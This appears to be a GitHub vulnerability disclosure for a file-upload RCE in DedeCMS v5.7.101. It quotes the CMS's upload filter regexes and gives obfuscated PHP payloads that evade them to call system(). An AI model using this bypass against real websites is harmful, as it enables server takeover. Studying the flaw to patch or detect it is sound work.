Skip to content

linchuzhu/Dedecms-v5.7.101-RCE

main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 

Dedecms-v5.7.101-RCE

Vulnerability Description

Since CVE-2022-40886 is not fully fixed, Dedecms still has a file upload vulnerability, leading to RCE.

Vulnerability to reproduce

Log in to the backend of the website.

RCE-1

Upload the file hhh.php, the content of the file is as follows:

<?php $x='sys';$xx='tem';$xxx=$x.$xx;$y='di';$yy='r';$yyy=$y.$yy;$xxx($yyy) ?>

RCE-2

Visit hhh.php

RCE-3

Vulnerability Analysis

In /dede/file_manage_control.php, the content of the file we upload will first be checked by uploadsafe.inc.php.

In CVE-2022-40886, the POC uses $_COOKIE to bypass the $cfg_disable_funs parameter blacklist. It can be seen that in v5.7.101, uploads/include/uploadsafe.inc.php added the limit of $_COOKIE, and added some regular matching filtering.

RCE-4

Focus on the regular matching expression added by uploadsafe.inc.php.

if(preg_match("#<\?(php|=)#i", " {$content}") == TRUE) {
    if(preg_match("#[$][_0-9a-z]+[\s]*[(][\s\S]*[)][\s]*[;]#iU", " {$content}") == TRUE) {
        $content = dede_htmlspecialchars($content);
        die("DedeCMS提示:当前上传的文件中存在木马!<pre>{$content}</pre>");
    }
    if(preg_match("#[@][$][_0-9a-z]+[\s]*[(][\s\S]*[)]#iU", " {$content}") == TRUE) {
        $content = dede_htmlspecialchars($content);
        die("DedeCMS提示:当前上传的文件中存在木马!<pre>{$content}</pre>");
    }
    if(preg_match("#[`][\s\S]*[`]#i", " {$content}") == TRUE) {
        $content = dede_htmlspecialchars($content);
        die("DedeCMS提示:当前上传的文件中存在后门!<pre>{$content}</pre>");
    }
}

Among them, there is the following regular expression, if the match is successful, the process will be terminated and returned DedeCMS提示:当前上传的文件中存在木马

[$][_0-9a-z]+[\s]*[(][\s\S]*[)][\s]*[;]

This regular expression prevents a lot of malicious code, but it needs to meet the requirements ending with ;, and shell injection can still be performed through <?php ?>.

<?php $x='sys';$xx='tem';$xxx=$x.$xx;$y='ca';$yy='lc';$yyy=$y.$yy;$xxx($yyy) ?>

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published